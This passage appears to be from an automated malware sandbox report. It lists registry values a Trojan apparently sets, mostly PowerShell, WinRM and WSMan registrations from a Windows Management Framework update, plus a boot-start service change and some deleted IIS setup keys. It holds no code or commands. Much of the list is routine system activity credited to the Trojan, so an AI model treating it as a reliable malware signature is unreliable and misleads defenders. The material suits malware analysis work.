"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"
[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"
[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"
[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"
[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"UpgradeType" = "0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"
[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "6/27/2016"
"ReleaseType" = "Software Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 5D 3B F8 58 A0 4B 7B 52 FE 41 83 6D F6 7D 89"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"
[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"
[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.psc1]
"Content Type" = "application/PowerShell"
[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"
[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"
[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160627"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"
[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"
[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"
[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"
[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"
[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8]
The process mscorsvw.exe:2656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
